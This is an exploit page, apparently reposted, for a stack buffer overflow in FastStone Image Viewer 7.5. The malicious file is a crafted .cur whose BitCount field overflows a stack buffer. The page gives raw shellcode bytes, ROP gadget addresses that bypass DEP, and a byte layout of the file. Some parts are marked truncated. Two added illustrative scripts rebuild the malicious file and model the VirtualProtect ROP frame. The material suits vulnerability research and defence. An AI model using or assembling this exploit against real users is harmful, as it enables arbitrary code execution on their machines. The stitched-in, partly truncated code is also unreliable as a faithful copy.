FastStone Image Viewer 7.5 – .cur BITMAPINFOHEADER ‘BitCount’ Stack Based Buffer Overflow (ASLR & DEP Bypass) – Digitalmunition





Published on March 21st, 2021

# Exploit title: FastStone Image Viewer 7.5 - .cur BITMAPINFOHEADER 'BitCount' Stack Based Buffer Overflow (ASLR & DEP Bypass)
# Exploit Author: Paolo Stagno
# Date: 15/03/2020
# Vendor Homepage: https://www.faststone.org/
# Download: https://www.faststonesoft.net/DN/FSViewerSetup75.exe
#                    https://github.com/VoidSec/Exploit-Development/tree/master/windows/x86/local/FastStone_Image_Viewer_v.7.5/
# Version: 7.5
# Tested on: Windows 10 Pro x64 v.1909 Build 18363.1256
# Category: local exploit
# Platform: windows

# Module info :
#----------------------------------------------------------------------------------------------------------------------
#Base       | Top        | Size       | Rebase | SafeSEH | ASLR  | NXCompat | OS Dll | Version, Modulename & Path
#----------------------------------------------------------------------------------------------------------------------
#0x00400000 | 0x00abf000 | 0x006bf000 | False  | False   | False |  False   | False  | 7.5.0.0 [FSViewer.exe] (C:\Program Files (x86)\FastStone Image Viewer\FSViewer.exe)
#0x6ad80000 | 0x6adfe000 | 0x0007e000 | False  | False   | False |  False   | False  | -1.0- [fsplugin05.dll] (C:\Program Files (x86)\FastStone Image Viewer\fsplugin05.dll)
#0x6afb0000 | 0x6b011000 | 0x00061000 | True   | True    | False |  False   | False  | -1.0- [fsplugin06.dll] (C:\Program Files (x86)\FastStone Image Viewer\fsplugin06.dll)
#----------------------------------------------------------------------------------------------------------------------

#!/usr/bin/python
import struct, sys
print("\n[>] FastStone Image Viewer v. <= 7.5 Exploit by VoidSec\n")

filename="FSViewer_v.7.5_exploit.cur"

###################################################################################
# Shellcode
# MAX Shellcode size: 556
# ImageData - ROP NOP - Rop Chain - Stack Adjustment = 776 - 144 - 68 - 8 = 556
# Custom calc.exe shellcode
# size: 112
###################################################################################

shellcode=(
    "\x31\xdb\x64\x8b\x7b\x30\x8b\x7f"
    "\x0c\x8b\x7f\x1c\x8b\x47\x08\x8b"
    "\x77\x20\x8b\x3f\x80\x7e\x0c\x33"
    "\x75\xf2\x89\xc7\x03\x78\x3c\x8b"
    "\x57\x78\x01\xc2\x8b\x7a\x20\x01"
    "\xc7\x89\xdd\x8b\x34\xaf\x01\xc6"
    "\x45\x81\x3e\x43\x72\x65\x61\x75"
    "\xf2\x81\x7e\x08\x6f\x63\x65\x73"
    "\x75\xe9\x8b\x7a\x24\x01\xc7\x66"
    "\x8b\x2c\x6f\x8b\x7a\x1c\x01\xc7"
    "\x8b\x7c\xaf\xfc\x01\xc7\x89\xd9"
    "\xb1\xff\x53\xe2\xfd\x68\x63\x61"
    "\x6c\x63\x89\xe2\x52\x52\x53\x53"
    "\x53\x53\x53\x53\x52\x53\xff\xd7"
)


if (len(shellcode)>556):
    sys.exit("Shellcode's size must be <= 556 bytes")

###################################################################################
# Cur File Format
# ---------------------------------------------------------------------------------
# Header:
# | Reserved | Type  | Image Count |
# | 00 00    | 02 00 | 02 00       | <- the CUR file contains two images
# Entries:
# | Width | Height | ColorCount | Reserved | XHotSpot | YHotSpot | SizeInBytes | File Offset |
# | 30    | 30     | 00         | 00       | 01 00    | 02 00    | 30 03 00 00 | 26 00 00 00 | <- the first image is corrupted with the ROP chain & shellcode
# | 20    | 20     | 00         | 00       | 02 00    | 04 00    | E8 02 00 00 | 56 03 00 00 | <- the second is left "untouched", apart from the stack pivot (this should keep the cursor preview intact)
# 1st Image Info Header (BITMAPINFOHEADER):
# | Size        | Width       | Height      | Planes | BitCount | Compression | ImageSize   | XpixelsPerM | YpixelsPerM | Colors Used | ColorsImportant |
# | 28 00 00 00 | 30 00 00 00 | 60 00 00 00 | 01 00  | 89 30    | 00 00 00 00 | 00 00 00 00 | 00 00 00 00 | 00 00 00 00 | 00 00 00 00 | 00 00 00 00     |
# 1st ImageData (BLOB)
# 2nd Image Info Header:
# 2nd ImageData (BLOB)
# ---------------------------------------------------------------------------------
# BitCount (0x3089, stored little-endian as "89 30") is used to compute the number of bytes
# read into a fixed-size stack buffer, which is what overflows it. The value can be changed,
# but two operations the software performs on it have to be accounted for:
# - SHL 1, 0x89: x86 keeps only the low 5 bits of a shift count, so 0x89 & 0x1F = 9 and 1 << 9 = 0x200
# - SHL 0x200, 2 = 0x800 (2048d): the number of bytes read from the file
# The image data has to be padded to match the SizeInBytes declared in the directory entry:
# ImageData = SizeInBytes - ImageInfoHeader Size (0x330 - 0x28 = 0x308 = 776d)
###################################################################################

image_data_pad = 776

def create_rop_nop():
    # A single "DEC ECX # RETN" gadget; repeated, it fills the 144-byte ROP NOP area that
    # slides execution into the chain (the code that repeats it is truncated in this copy)
    rop_gadgets = [
        0x6adc5ab6, # 0x6adc5ab6 (RVA : 0x00045ab6) : # DEC ECX # RETN    ** [fsplugin05.dll] **   |   {PAGE_EXECUTE_READ}
    ]
    return ''.join(struct.pack('<I', g) for g in rop_gadgets)

def create_rop_chain():
    # PUSHAD-based chain: each block below loads one register, then PUSHAD turns the
    # register set into a call frame on the stack. The gadgets preceding the EBX operand
    # (including the POP EBX gadget itself) are truncated in this copy of the listing.
    rop_gadgets = [
        #[---INFO:gadgets_to_set_ebx:---]
        # (POP EBX gadget and its operand, "... -> ebx", truncated)
        #[---INFO:gadgets_to_set_edx:---]
        0x004798db,  # POP EDX ; RETN [FSViewer.exe] 
        0x00000040,  # 0x00000040-> edx (PAGE_EXECUTE_READWRITE)
        #[---INFO:gadgets_to_set_ecx:---]
        0x004c7832,  # POP ECX ; RETN [FSViewer.exe] 
        0x00991445,  # &Writable location [FSViewer.exe]
        #[---INFO:gadgets_to_set_edi:---]
        0x0040c3a8,  # POP EDI ; RETN [FSViewer.exe] 
        0x0057660b,  # RETN (ROP NOP) [FSViewer.exe]
        #[---INFO:gadgets_to_set_eax:---]
        0x00404243,  # POP EAX ; RETN [FSViewer.exe] 
        0x90909090,  # nop
        #[---INFO:pushad:---]
        0x6adc21bf,  # PUSHAD # RETN [fsplugin05.dll] 
    ]
    return ''.join(struct.pack('<I', g) for g in rop_gadgets)
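The following is an added example (an editor's illustration, not code from the original exploit or from VoidSec). It builds the two-image .cur layout documented in the "Cur File Format" comments above with a caller-chosen BitCount, parses it back the way a consumer of the format would, and reproduces the two shifts the advisory says FSViewer applies to BitCount to size its read, including the x86 rule that a 32-bit shift count is masked to its low 5 bits. Assumptions, labelled in the code: the image data is filler (the exploit places the ROP chain and shellcode there), the second image's BITMAPINFOHEADER fields other than its SizeInBytes and offset are placeholders, and the size of the destination stack buffer is not stated on the page, so the example compares the derived read length against the image data the file actually declares and against the set of BitCount values the DIB format defines.

```python
import struct

ICONDIR = struct.Struct("<HHH")                   # Reserved, Type (2 = CUR), Count
ICONDIRENTRY = struct.Struct("<BBBBHHII")         # W, H, Colors, Rsvd, XHot, YHot, SizeInBytes, FileOffset
BITMAPINFOHEADER = struct.Struct("<IiiHHIIiiII")  # 40-byte DIB header; BitCount is field index 4
VALID_BIT_COUNTS = (1, 4, 8, 16, 24, 32)          # the only biBitCount values the DIB format defines


def shl32(value, count):
    """x86 SHL on a 32-bit operand keeps only the low 5 bits of the count (count & 0x1F)."""
    return (value << (count & 0x1F)) & 0xFFFFFFFF


def derived_read_length(bit_count):
    """The two shifts from the advisory: SHL 1,BitCount then SHL 2.
    For 0x3089 the masked count is 9, so 1 << 9 = 0x200 and 0x200 << 2 = 0x800 (2048)."""
    return shl32(shl32(1, bit_count), 2)


def build_cur(bit_count, image_data_size=776, second_size=0x2E8):
    """Two-entry CUR using the header values from the advisory's comments.
    Entry 1: 48x48, DIB height 0x60 (XOR and AND masks stacked), 776 data bytes.
    Entry 2: placeholder image whose SizeInBytes (0x2E8) and offset (0x356) match the page."""
    bih1 = BITMAPINFOHEADER.pack(40, 0x30, 0x60, 1, bit_count, 0, 0, 0, 0, 0, 0)
    data1 = b"A" * image_data_size                   # filler; the exploit's ROP chain + shellcode go here
    size1 = len(bih1) + len(data1)                   # 0x28 + 0x308 = 0x330
    offset1 = ICONDIR.size + 2 * ICONDIRENTRY.size   # 6 + 2*16 = 0x26
    offset2 = offset1 + size1                        # 0x356
    bih2 = BITMAPINFOHEADER.pack(40, 0x20, 0x40, 1, 1, 0, 0, 0, 0, 0, 0)  # assumed fields
    data2 = b"\x00" * (second_size - len(bih2))
    return (ICONDIR.pack(0, 2, 2)
            + ICONDIRENTRY.pack(0x30, 0x30, 0, 0, 1, 2, size1, offset1)
            + ICONDIRENTRY.pack(0x20, 0x20, 0, 0, 2, 4, second_size, offset2)
            + bih1 + data1 + bih2 + data2)


def parse_cur(blob):
    """Parse the directory and each image's DIB header. Returns, per image, the declared
    sizes, the BitCount, whether BitCount is a legal value, and the read length the
    advisory's shift sequence would derive from it."""
    reserved, kind, count = ICONDIR.unpack_from(blob, 0)
    if reserved != 0 or kind != 2:
        raise ValueError("not a CUR file")
    images = []
    for i in range(count):
        w, h, _colors, _rsvd, xhot, yhot, size, off = ICONDIRENTRY.unpack_from(
            blob, ICONDIR.size + i * ICONDIRENTRY.size)
        if off + size > len(blob) or size < BITMAPINFOHEADER.size:
            raise ValueError("entry %d: SizeInBytes/offset inconsistent with file length" % i)
        hdr = BITMAPINFOHEADER.unpack_from(blob, off)
        bit_count = hdr[4]
        images.append({
            "width": w, "height": h, "hotspot": (xhot, yhot),
            "offset": off, "size_in_bytes": size,
            "image_data_bytes": size - hdr[0],
            "bit_count": bit_count,
            "bit_count_valid": bit_count in VALID_BIT_COUNTS,   # the check to make before sizing anything from it
            "derived_read_length": derived_read_length(bit_count),
        })
    return images


if __name__ == "__main__":
    for bc in (0x3089, 8):
        img = parse_cur(build_cur(bc))[0]
        print("BitCount 0x%04x valid=%s derived read=0x%x declared image data=%d" % (
            bc, img["bit_count_valid"], img["derived_read_length"], img["image_data_bytes"]))
```

The point of the `bit_count_valid` field is the check a parser should make: BitCount has only six legal values, and a size computed from `1 << BitCount` must be rejected or clamped before it is used, because the hardware shift silently turns an out-of-range count such as 0x3089 into a shift of 9 instead of failing.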
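The ROP chain above ends in `PUSHAD # RETN` after loading EDX = 0x40, ECX = a writable address, EDI = a RETN gadget and EAX = 0x90909090. The following added example (not code from the original exploit) models what PUSHAD writes to the stack and how the CPU then consumes that frame. It assumes, as the register layout suggests but the page does not state, that the call target loaded into ESI is VirtualProtect(); the ESI, EBP and EBX values are absent from this copy of the listing, so the ones below are hypothetical placeholders rather than gadgets from FSViewer.exe.

```python
import struct

# Values visible in the chain on this page
EDX_FLNEWPROTECT = 0x00000040    # PAGE_EXECUTE_READWRITE
ECX_LPFLOLDPROTECT = 0x00991445  # writable location in FSViewer.exe
EDI_ROP_NOP = 0x0057660b         # RETN in FSViewer.exe
EAX_NOPS = 0x90909090            # four NOPs: the first bytes executed once memory is RWX

# Hypothetical placeholders (assumption: the truncated part of the chain sets these)
ESI_VIRTUALPROTECT = 0x7E000000  # hypothetical address of kernel32!VirtualProtect
EBP_PUSH_ESP_RET = 0x00410000    # hypothetical "PUSH ESP # RET" gadget
EBX_DWSIZE = 0x00000201          # hypothetical dwSize
ESP_AT_PUSHAD = 0x0019FF00       # hypothetical stack pointer when PUSHAD executes

PUSHAD_ORDER = ("eax", "ecx", "edx", "ebx", "esp", "ebp", "esi", "edi")


def pushad(regs):
    """Return the eight dwords PUSHAD leaves on the stack, lowest address first.
    PUSHAD pushes EAX, ECX, EDX, EBX, the original ESP, EBP, ESI, EDI in that order,
    so EDI ends up at the new ESP and EAX at the highest address of the frame."""
    return [regs[r] for r in reversed(PUSHAD_ORDER)]


def consume_frame(frame):
    """Walk the frame the way the CPU does after PUSHAD # RETN.
    The RETN pops the EDI slot (a ROP NOP), whose own RETN pops the ESI slot and jumps
    there. With ESI = VirtualProtect, the stack is now exactly a stdcall frame:
    return address (EBP), lpAddress (saved ESP), dwSize (EBX), flNewProtect (EDX),
    lpflOldProtect (ECX). VirtualProtect's RET 0x10 removes those five slots, so it
    returns to EBP with ESP pointing at the EAX slot; "PUSH ESP # RET" jumps there,
    and 0x90909090 executes as NOPs into whatever follows the chain (the shellcode)."""
    edi, esi, ebp, esp, ebx, edx, ecx, eax = frame
    return {
        "first_gadget": edi,
        "call_target": esi,
        "return_address": ebp,
        "lpAddress": esp,
        "dwSize": ebx,
        "flNewProtect": edx,
        "lpflOldProtect": ecx,
        "executes_next": eax,
    }


def pack_frame(frame):
    """Serialize the frame as the exploit packs its gadgets (little-endian dwords)."""
    return b"".join(struct.pack("<I", v) for v in frame)


def model_chain():
    regs = dict(eax=EAX_NOPS, ecx=ECX_LPFLOLDPROTECT, edx=EDX_FLNEWPROTECT, ebx=EBX_DWSIZE,
                esp=ESP_AT_PUSHAD, ebp=EBP_PUSH_ESP_RET, esi=ESI_VIRTUALPROTECT, edi=EDI_ROP_NOP)
    return consume_frame(pushad(regs))


if __name__ == "__main__":
    for name, value in model_chain().items():
        print("%-16s 0x%08x" % (name, value))
```

This is why the chain sets EDI to a bare RETN and EAX to 0x90909090: EDI is the first slot the RETN after PUSHAD consumes, so it must be a ROP NOP, and EAX is the slot execution lands on after the protection change, so it must be harmless code rather than a pointer.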
